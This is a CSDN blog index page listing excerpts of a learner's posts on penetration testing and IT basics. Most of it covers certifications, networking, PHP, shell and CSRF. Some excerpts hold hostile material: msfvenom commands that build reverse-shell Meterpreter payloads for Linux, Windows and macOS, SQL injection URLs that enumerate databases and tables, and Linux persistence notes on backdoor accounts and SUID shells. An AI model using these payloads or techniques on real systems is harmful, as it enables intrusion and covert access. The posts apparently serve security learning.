小丁长不胖-CSDN博客

转载网络安全相关行业的证书你需要了解一下

1. CISP （国家注册信息安全专业人员）说到CISP，安全从业者基本上都有所耳闻，算是国内权威认证，毕竟有政府背景给认证做背书，如果想在政府、国企及重点行业从业，企业获取信息安全服务资质，参与网络安全项目，这个认证都是非常重要的。CISP在你参加考试的时候，培训机构都会问你是选择CISO/CISE，不要担心，这两个只是考试方向，证书都是测评中心颁发的，认证详细情况请看后续推送…2. CISP-PTE （国家注册渗透测试工程师）这个认证是2017年360企业集团联合中国信息安全测评中心推出的国内首

2021-12-27 15:00:12 491

原创目录扫描Dirbuster的用法详解

WEB 渗透测试工具dirbuster的使用方法扫描Web目录，可以发现潜在的渗透目标。不同于网站爬虫，使用字典方式可以发现网站没有关联的网页。Kali Linux提供一款基于字典的Web目录扫描工具DIRB。该工具根据用户提供的字典，对目标网站目录进行暴力猜测。它会尝试以递归方式进行爆破，以发现更多的路径。同时，该工具支持代理、HTTP认证扫描限制访问的网站。该工具还提供两个命令，帮助用户从网页生成字典，或者生成定制字典。DirBuster是一个多线程的基于Java的应用程序设计蛮力Web /应用服务

2021-11-17 11:50:03 9007

原创 Linux权限维持

一：适配方法1：后门账户可疑用户排查：2：SUID ShellSuid shell是一种可用于以拥有者权限运行的shell。可疑排查：3：公私钥免密登录在客户端上生成一对公私钥，然后把公钥放到服务器上（~/.ssh/authorized_keys），保留私钥。当ssh登录时，ssh程序会发送私钥去和服务器上的公钥做匹配。如果匹配成功就可以登录了。客户端与服务端执行：ssh-keygen -t rsa #过程中按三次回车其中 id_rsa为私钥，id_rsa.pub为公钥，接

2021-07-22 17:16:22 248

原创 MSF生成各类攻击载荷

Linux:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elfWindows:msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exeMac:msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.m

2021-07-21 15:48:36 499

原创 CVE监控工具

一：介绍监控Github上的漏洞、红队等信息发送钉钉、邮箱、Telegram BOT、server酱，Telegram BOT时需要安装telegram bot需要的库：pip3 install python-telegram-bot二：服务部署步骤一：在海外云主机上运行一下命令拉取项目文件git clone https://github.com/JustYoomoon/CVEAP.git步骤二：进入项目文件进行配置（钉钉）##########修改处1########钉钉def dingd

2021-07-21 15:46:20 865 1

原创 MSSQL安装

2021-07-16 16:32:46 1293

原创域环境搭建与管理

域环境搭建与管理一:内网渗透基础内网也是指计算机网络中根据地理范围划分中的局域网(Local Area Network)，即内网等同于局域网。内网渗透又叫做后渗透，区别于前渗透的WEB渗透，内网渗透是指从获取WEB服务器的shell之后到拿下内网全部主机的过程叫做内网渗透。什么是计算机网络？计算机网络是将地理位置不同的具有独立功能的多台计算机及其外部设备，通过通信线路连接，在网络操作系统，网络管理软件及网络通信协议管理和协调下，实现资源共享和信息传递的计算机系统。1:工作组工作组（Work

2021-07-16 16:26:33 625

原创 Python爬虫抓取图片到本地

Python爬虫抓取图片到本地一：目标站点信息彼岸桌面网址为：http://www.netbian.com/二：目标站点分析(1)：构造页面的URL列表我们需要做的是爬取网站上给定页数的图片，所以，我们首先需要的就是观察各个页面链接之间的关系，进而构造出需要爬取页面的url列表。可以看出，从第二页开始之后的页面链接只是后面的数字不同，我们可以写个简单的代码，获取页面的url列表(2)：获取一个页面中所有的图片的链接我们已经获取了所有页面的链接，但是没有获取每张图片的链接，所以

2021-07-16 16:12:27 1826

原创 PHP基础知识总结

PHP 基础知识总结：PHP 代表 PHP: Hypertext PreprocessorPHP 文件可包含文本、HTML、JavaScript代码和 PHP 代码PHP 代码在服务器上执行，结果以纯 HTML 形式返回给浏览器PHP 文件的默认文件扩展名是 “.php”PHP能做什么？PHP 可以生成动态页面内容PHP 可以创建、打开、读取、写入、关闭服务器上的文件PHP 可以收集表单数据PHP 可以发送和接收 cookiesPHP 可以添加、删除、修改您的数据库中

2021-06-25 15:11:55 447

原创浅谈CSRF漏洞介绍

CSRF漏洞介绍CSRF（英语：Cross-site request forgery）跨站请求伪造，也被称为 one-click attack 或者 session riding，通常缩写为 CSRF 或者 XSRF，是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本（XSS）相比，XSS 利用的是用户对指定网站的信任，CSRF 利用的是网站对用户网页浏览器的信任。最大的区别就是CSRF没有盗取用户的cookie,而是直接的利用了浏览器存储的cookie让用户去执行某

2021-06-25 15:07:33 356

原创浅谈逻辑漏洞与越权漏洞

什么是逻辑漏洞？web应用程序中的逻辑漏洞各不相同，有的很明显，有的很微妙。与SQL注入和跨站不同，逻辑漏洞没有共有的“签名”，定义特性是指应用程序执行的逻辑存在某种缺陷。大部分逻辑缺陷表现为开发者在思考过程中做出的特殊假设存在明显或隐含的错误，通俗点来说，有的开发者会这样认为，如果发生A，就会出现B，因此我执行C。没有考虑如果发生X会怎么样，这种错误的假设会造成许多安全漏洞。逻辑漏洞是多样性的，挖掘它们需要从不同的角度思考问题，设法了解设计者和开发者做出的各种假设，然后考虑如何攻击。常见的逻辑漏洞：

2021-06-01 16:14:20 700

原创数据库查询语句

http://localhost/index.php?uid=88’ union select 1,schema_name,3 from information_schema.schemata–+-----查询所有数据库名http://localhost/index.php?uid=88 union select 1,table_name,3 from information_schema.tables where table_schema=“zrb”–+-----查询zrb数据库里的表明http:

2021-05-31 21:12:12 216

原创 SQL注入原理

sql注入原理sql注入产生的原因：前端传递数据给服务器带入到数据库进行执行，用户在传递数据的时候没有进行严格的检查导致恶意的sql语句拼接到原有的语句上导致sql注入的产生。漏洞发现union联合查询union联合查询 mysql 5.0版本以上存在information_schema数据并且有回显union 连接前后的两个语句一起执行后面的语句字段数必须和前面的一样;information_schema库里面包含所有数据库中的结构包括数据库名表名字段名union

2021-05-31 21:10:30 176

原创关于渗透测试以及网络安全法

网络安全的定义：网络安全（Cyber Security）是指网络系统的硬件、软件及其系统中的数据受到保护，不因偶然的或者恶意的原因而遭受到破坏、更改、泄露，系统连续可靠正常地运行，[网络服务](https://baike.baidu.com/item/网络服务/9498645)不中断。网络安全的基本要素：保密性：信息不泄露给非授权用户、实体或过程，或供其利用的特性。完整性：数据未经授权不能进行改变的特性。即信息在存储或传输过程中保持不被修改、不被破坏和丢失的特性。可用性：可被授权实体访问并按需

2021-05-17 11:42:09 1924

原创使用Mysql在cmd里创建数据库

使用 mysql 创建数据库使用普通用户，你可能需要特定的权限来创建或者删除 MySQL 数据库。所以我们这边使用root用户登录，root用户拥有最高权限，可以使用 mysql mysqladmin 命令来创建数据库。以下命令简单的演示了创建数据库的过程，数据名为 RUNOOB:使用 mysql删除数据库：你也可以使用 mysql 命令在终端来执行删除命令。以下实例删除数据库 RUNOOB(该数据库在前一章节已创建)：[root@host]# mysqladmin -u root -p d

2021-05-06 17:55:07 1167

原创关于Shell与Linux的命令

什么是Shell？Shell是系统的用户界面，提供了用户与内核进行交互的一种接口（命令解释器），Shell接收用户输入的命令并把他送入内核执行，在用户与系统之间进行交互。Shell在整个Linux中具有极其重要的地位。Shell是一个用C语言编写的程序，它是用户使用Linux的桥梁Shell的功能：命令解释器是Shell最重要的功能。Linux系统中所有的可执行文件都可以作为Shll来执行常见Linux中可

2021-04-21 19:47:45 360

原创关于Shell的功能介绍

**Usrshell简介：1.shell的功能类别说明Linux命令存放在/bin、sbin目录下的命令内置命令出于效率的考虑，将一些命令的解释程序构造在Shell内部实用程序存放在/Usr/bin、/Usr/sbin、/Usr/local/bin、/Usr/local/sbin等目录下的实用程序用户程序用户程序经过编译生成可执行文件后可作为Shell命令运行Shell脚本有Shell脚本编写的批处理文件Shell的主要版本常见的Shell版本主要二如下：bash：多数

2021-04-20 21:06:27 1634

原创 HTTP常用的随笔

1. HTTP协议特点（1.）之支持客户/服务器模式，也就是客户端发起请求，服务端响应请求（2.）简单快速：客户端向服务端发起请求时，只需要请求方法和路径常用的请求方法，GET POST HEAD等，请求方法决定了客户端与服务器联系方式的不同。由于HTTP协议的的简单，使得HTTP服务器的程序规模小，因而速度很快（3.）灵活允许传输任意类型的数据类型，正在传输的类型由Content-Type（HTTP包中用来表示内容类型的标识）加以标记（4.）无连接无连接即是限制每次处理一个请求..

2021-04-15 20:07:30 79

原创关于IP地址的概述

IP地址概述（ipv4)没有考虑过IP会枯竭32位2进制数,4 个8位2进制数组成近几年不会枯竭，NAT技术外网ipv6长度：32位 2^32≈43亿范围：0.0.0.0-255.255.255.255二进制：00000000 11111111十进制： 0 255构成：网络位+主机位类比：区号+电话号码，即使只要区号不相同，即使号码相同也无所谓。不同的局域网有不同的网络部分，通过网络部分区分网段/网络：局域网内部，主机部分不能一样，否则会出先IP冲突。IP地址

2021-04-14 18:03:21 1361

原创计算机的组成与dos命令

计算机硬件与软件的组成中央处理器：运算器，控制器统称为中央处理器（cpu）：负责数据的算数运算和逻辑运算，及数据的加工处理，是整个计算机的中枢神经，分析程序的可控制信息，并根据程序要求进行控制，协调计算机各部分组件工作及内存与外设的访问等。存储器：实现记忆功能的部件，用来存储程序，数据和各种信号，命令等信息，并在需要时提供这些信息。内存（rom只读存储器；ram随机存储器；断电就会消失）；外存（硬盘，软盘，光盘）。输入输出设备：计算机从输入设备获得外部的信息，输入设备将外部信息以一定的数据

2021-04-13 21:34:23 138

原创计算机基础知识

1.什么是计算机网络？计算机网络是指将地理位置不同的具有独立功能的多台计算机及其外部设备，通过通信线路连接起来，在网络操作系统，网络管理软件及网络通信协议的管理和协调下，实现资源共享和信息传递的计算机系统。前渗透：wbllshell权限/后台权限后渗透：主机权限/域控权限2.工作组...

2021-04-06 19:24:16 140

原创计算机环境搭建

基础环境搭建操作系统：管理计算机硬件以及计算机软件的系统软件操作系统类型windows----个人版本：windows xp/windows 7/8/8.1/10 /windows95/windows2000 ----黑客操作系统：悬剑3.0/4.0----服务器版本：windws server 2003/2008/2008R2/2012/2012R2/2016/2019LinuxLinux下的账户系统文件主要有：/etc/passwd、/etc/shadow、/etc/group和/et

2021-03-29 21:54:22 161

小丁长不胖